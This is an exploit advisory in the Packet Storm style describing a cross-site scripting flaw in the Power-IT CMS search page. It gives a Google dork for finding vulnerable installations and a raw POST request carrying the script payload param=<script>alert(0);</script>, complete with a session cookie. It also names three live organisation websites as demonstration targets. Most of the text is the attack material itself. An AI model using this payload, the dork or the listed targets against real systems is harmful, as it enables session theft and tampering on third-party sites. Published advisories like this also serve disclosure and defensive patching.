Power-IT CMS Cross Site Scripting

2012-08-25T00:00:00
ID PACKETSTORM:115887
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
                                            `###################################################################################  
  
# Exploit Title: Power-IT Cms Cross Site Scripting Vulnerability  
#  
# Google Dork: intext:"Powered by PowerIT"  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Vendor Home : http://www.poweritschools.com/  
#  
# Tested on: all  
#  
###################################################################################  
  
======================================  
POST DATA /Host: www.ceca-ct.org  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101   
Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Referer: http://www.ceca-ct.org/results.php  
Cookie: PHPSESSID=9c2f3ccfeb3a6cf788a60953985f5675  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 26  
param=<script>alert(0);</script>&Submit=Search  
or just goto search page and put your html code in search Input ;)  
D3M0 :   
http://www.ceca-ct.org/results.php  
http://www.seedschooldc.org/results.php  
http://www.njecc.org/results.php  
  
===============Crim3R@Att.Net=========  
$Home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir   
  
`